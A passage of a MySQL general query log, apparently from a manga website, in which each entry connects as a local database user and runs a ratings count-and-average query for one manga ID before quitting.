created desc 330643445 Quit 330643446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330643446 Quit 330643447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330643447 Quit 330643448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330643448 Quit 330643449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330643449 Quit 330643450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330643450 Quit 330643451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330643451 Quit 330643452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330643452 Quit 330643453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330643453 Quit 330643454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330643454 Quit 330643455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330643455 Quit 330643456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330643456 Quit 330643457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330643457 Quit 330643458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330643458 Quit 330643459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330643459 Quit 330643460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330643460 Quit 330643461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330643461 Quit 330643462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330643462 Quit 330643463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330643463 Quit 330643464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330643464 Quit 330643465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330643465 Quit 330643466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330643466 Quit 330643467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330643467 Quit 330643468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330643468 Quit 330643469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330643469 Quit 330643470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330643470 Quit 330643471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330643471 Quit 330643472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330643472 Quit 330643473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330643473 Quit 330643474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330643474 Quit 330643475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330643475 Quit 330643476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330643476 Quit 330643477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330643477 Quit 330643478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330643478 Quit 330643479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330643479 Quit 330643480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330643480 Quit 330643481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330643481 Quit 330643482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330643482 Quit 330643483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330643483 Quit 330643484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330643484 Quit 330643485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330643485 Quit 330643486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330643486 Quit 330643487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330643487 Quit 330643488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330643488 Quit 330643489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330643489 Quit 330643490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330643490 Quit 330643491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330643491 Quit 330643492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330643492 Quit 330643493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330643493 Quit 330643494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330643494 Quit 330643495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330643495 Quit 330643496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330643496 Quit 330643497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330643497 Quit 330643498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330643498 Quit 330643499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330643499 Quit 330643500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330643500 Quit 330643501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330643501 Quit 330643502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330643502 Quit 330643503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330643503 Quit 330643504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330643504 Quit 330643505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330643505 Quit 330643506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330643506 Quit 330643507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330643507 Quit 330643508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330643508 Quit 330643509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330643509 Quit 330643510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330643510 Quit 330643511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330643511 Quit 330643512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330643512 Quit 330643513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330643513 Quit 330643514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330643514 Quit 330643515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330643515 Quit 330643516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330643516 Quit 330643517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330643517 Quit 330643518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330643518 Quit 330643519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330643519 Quit 330643520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330643520 Quit 330643521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330643521 Quit 330643522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330643522 Quit 330643523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330643523 Quit 330643524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330643524 Quit 330643525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330643525 Quit 330643526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330643526 Quit 330643527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330643527 Quit 330643528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330643528 Quit 330643529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330643529 Quit 330643530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330643530 Quit 330643531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330643531 Quit 330643532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330643532 Quit 330643533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330643533 Quit 330643534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330643534 Quit 330643535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330643535 Quit 330643536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330643536 Quit 330643537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330643537 Quit 330643538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330643538 Quit 330643539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330643539 Quit 330643540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330643540 Quit 330643541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330643541 Quit 330643542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330643542 Quit 330643543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330643543 Quit 330643544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330643544 Quit 330643545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330643545 Quit 330643546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330643546 Quit 330643547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330643547 Quit 330643548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330643548 Quit 330643549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330643549 Quit 330643550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330643550 Quit 330643551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330643551 Quit 330643552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330643552 Quit 330643553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330643553 Quit 330643554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330643554 Quit 330643555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330643555 Quit 330643556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330643556 Quit 330643557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330643557 Quit 330643558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330643558 Quit 330643559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330643559 Quit 330643560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330643560 Quit 330643561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330643561 Quit 330643562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330643562 Quit 330643563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330643563 Quit 330643564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330643564 Quit 330643565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330643565 Quit 330643566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330643566 Quit 330643567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330643567 Quit 330643568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330643568 Quit 330643569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330643569 Quit 330643570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330643570 Quit 330643571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330643571 Quit 330643572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330643572 Quit 330643573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330643573 Quit 330643574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330643574 Quit 330643575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330643575 Quit 330643576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330643576 Quit 330643577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330643577 Quit 330643578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330643578 Quit 330643579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330643579 Quit 330643580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330643580 Quit 330643581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330643581 Quit 330643582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330643582 Quit 330643583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330643583 Quit 330643584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330643584 Quit 330643585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330643585 Quit 330643586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330643586 Quit 330643587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330643587 Quit 330643588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330643588 Quit 330643589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330643589 Quit 330643590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330643590 Quit 330643591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330643591 Quit 330643592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330643592 Quit 330643593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330643593 Quit 330643594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330643594 Quit 330643595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330643595 Quit 330643596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330643596 Quit 330643597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330643597 Quit 330643598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 